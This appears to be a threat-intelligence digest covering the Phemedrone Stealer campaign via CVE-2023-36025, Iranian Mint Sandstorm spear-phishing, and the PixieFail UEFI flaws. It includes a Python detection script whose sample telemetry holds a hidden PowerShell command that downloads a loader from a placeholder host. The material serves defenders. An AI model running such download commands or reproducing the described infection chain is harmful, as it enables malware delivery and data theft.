2024-01-29

Ransomware/Malware Activity

Vulnerability Exploited to Drop Phemedrone Stealer in Targeted Browsers, Crypto Wallets, and Messaging Apps

Threat actors have been observed exploiting CVE-2023-36025, a Windows SmartScreen bypass vulnerability, to deliver the open-source malware Phemedrone Stealer. Phemedrone Stealer is an information stealer that targets web browsers, messaging applications such as Telegram and Discord, and cryptocurrency wallets. Once the data is collected, it is exfiltrated to the threat actors through Telegram and their command-and-control (C2) server infrastructure. Phemedrone is deployed using CVE-2023-36025 by tricking the victim into clicking a link to a .URL file that has been masked with URL shorteners and posted to a messaging app. After the victim clicks the malicious link, the .URL file connects to the threat actor's C2 server and then executes a control panel file that takes advantage of CVE-2023-36025 to invoke rundll32.exe. The control panel file, a DLL loaded by rundll32.exe, uses Windows PowerShell to download a shellcode loader that executes the Phemedrone Stealer malware. According to Trend Micro, Phemedrone Stealer can target the following data: Chromium-based browsers, cryptocurrency wallets, system information of the infected device, Telegram, and Gecko-based browsers (i.e., Firefox). This campaign is still exploiting CVE-2023-36025 even though Microsoft patched the vulnerability in November 2023, demonstrating how important it is to keep systems up to date to avoid exploitation of known CVEs. CTIX analysts will continue to monitor the development of Phemedrone Stealer.
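The infection chain above (a control panel file invoked through rundll32.exe, which then launches PowerShell) is a pattern a defender can hunt for in process telemetry. The following is an added example, not code from the original digest or from Trend Micro; the event records, field names and paths are constructed for illustration and should be mapped to your own EDR or Sysmon schema.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed schema for this example)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry resembling the Phemedrone chain: rundll32.exe
# loads a .cpl from a user-writable directory and spawns PowerShell (pid 300).
# Event 400 is a benign Control Panel launch (desk.cpl from System32) with no
# PowerShell child, so it must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\u\AppData\Local\Temp\sec.cpl"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c iwr https://placeholder.invalid/loader"),
    ProcEvent(400, 100, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\desk.cpl"),
    ProcEvent(500, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

CPL_RE = re.compile(r"(\S+\.cpl)\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_cpl_to_powershell(events):
    """Return one finding per powershell.exe whose parent is rundll32.exe
    running a .cpl. 'in_user_path' marks a .cpl outside the Windows directory,
    which legitimate Control Panel applets never need."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) != "rundll32.exe":
            continue
        m = CPL_RE.search(parent.cmdline)
        if not m:
            continue
        cpl = m.group(1)
        findings.append({"rundll32_pid": parent.pid, "powershell_pid": e.pid,
                         "cpl": cpl, "in_user_path": "\\users\\" in cpl.lower()})
    return findings
```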

Threat Actor Activity

Iranian Hackers Use Adept Social Engineering Skills to Gather War-Related Intelligence

A technically and operationally mature subgroup of the Iranian cyber espionage group Mint Sandstorm has been targeting high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the US. Mint Sandstorm (a.k.a. APT35/Charming Kitten/PHOSPHORUS) has been linked to the Islamic Revolutionary Guard Corps (IRGC), and operators within the subgroup are known for their patience and skillful social engineering, which often lacks the telltale signs present in most phishing emails. The recent activity associated with this subgroup has been ongoing since November 2023. The Iranian state-backed hackers are using custom spear-phishing lures centered on the Israel-Palestine war, posing as journalists or other high-profile individuals and exchanging emails with targets to build trust; in some cases they have used legitimate, compromised email accounts belonging to the individuals they were impersonating. The emails sent to targets requested input on articles relating to the Israel-Palestine conflict, and the hackers then sent links to a malicious ".rar" file that supposedly contained the documents or related articles. In some cases, researchers have uncovered the use of a custom backdoor called MediaPL, which is disguised as Windows Media Player to evade detection and uses encrypted communication channels to exchange information with its command-and-control (C2) server. MediaPL and another backdoor, MischiefTut, can be used to launch commands received from the C2 server, run reconnaissance commands, and download additional tools to maintain access in a compromised environment and continuously evade detection.
Based on the Israel-Palestine related lures and the targeting of individuals potentially within the intelligence and policy communities, this campaign is likely being used to gather information and perspective on events related to the war from a range of individuals.

Vulnerabilities

Nine Vulnerabilities Known as PixieFail Expose Millions of Computers to Exploitation

Cybersecurity researchers identified nine (9) vulnerabilities, collectively tracked as PixieFail, in the IPv6 network protocol stack (NetworkPkg) of TianoCore's EDK II, an open-source implementation of UEFI. UEFI is the low-level and complex chain of firmware responsible for booting modern computers. These vulnerabilities, ranging from integer underflows to weak pseudorandom number generators, affect the firmware's networking modules, particularly the PXE boot process, and can be exploited from within the local network and, in some scenarios, remotely. The flaws enable attacks including remote code execution (RCE), denial-of-service (DoS), information leakage, and network session hijacking. The CERT Coordination Center (CERT/CC) has published an advisory with guidance for affected vendors, detailing the actions that should be taken to prevent exploitation. These include updating to the latest stable version of the UEFI firmware, as well as manual configuration measures such as disabling PXE boot where it is not used or supported in the computing environment. CTIX analysts recommend that all affected users ensure they are running the most secure version of their UEFI firmware.

